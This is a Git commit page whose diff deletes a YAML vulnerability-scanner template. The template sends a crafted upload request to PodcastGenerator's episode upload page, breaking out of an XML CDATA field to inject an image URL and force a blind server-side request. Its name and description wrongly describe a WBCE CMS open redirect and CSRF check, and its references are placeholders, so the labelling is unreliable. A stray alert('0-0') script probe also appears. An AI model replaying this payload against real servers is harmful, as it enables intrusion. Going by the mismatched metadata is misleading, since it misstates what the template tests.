Delete PodcastGenerator-Blind_SSRF-via-XML_Injection.yaml
alert('0-0')
GitHub
parent
c9b0507081
commit
b5914808cd
|
|
@ -1,57 +0,0 @@
|
|||
id: wbce-cms-open-redirect-csrf
|
||||
info:
|
||||
name: WBCE CMS 1.6.1 - Open Redirect & CSRF
|
||||
author: MrHarshvardhan
|
||||
severity: medium
|
||||
description: |
|
||||
Template to detect the Open Redirect & CSRF vulnerability in WBCE CMS 1.6.1.
|
||||
reference:
|
||||
- https://example.com/vulnerability-info
|
||||
- https://example.com/patch-info
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- /PodcastGenerator/admin/episodes_upload.php
|
||||
headers:
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q
|
||||
body:
|
||||
type: multipart-data
|
||||
boundary: ----WebKitFormBoundarypRUTcUa48pmEcI6Q
|
||||
items:
|
||||
- name: file
|
||||
filename: "2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"
|
||||
content-type: image/jpeg
|
||||
data: |
|
||||
image content blaaahblahasdfjblaaah;sdfblaaahasdf
|
||||
asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd
|
||||
- name: title
|
||||
value: test
|
||||
- name: shortdesc
|
||||
value: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
|
||||
- name: date
|
||||
value: "2023-07-01"
|
||||
- name: time
|
||||
value: "17:02"
|
||||
- name: episodecover
|
||||
filename: ""
|
||||
content-type: application/octet-stream
|
||||
data: ""
|
||||
- name: longdesc
|
||||
value: test
|
||||
- name: episodenum
|
||||
value: "33"
|
||||
- name: seasonnum
|
||||
value: "33"
|
||||
- name: itunesKeywords
|
||||
value: ""
|
||||
- name: explicit
|
||||
value: no
|
||||
- name: authorname
|
||||
value: ""
|
||||
- name: authoremail
|
||||
value: ""
|
||||
- name: customtags
|
||||
value: ""
|
||||
- name: token
|
||||
value: vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz
|
||||
Loading…
Reference in New Issue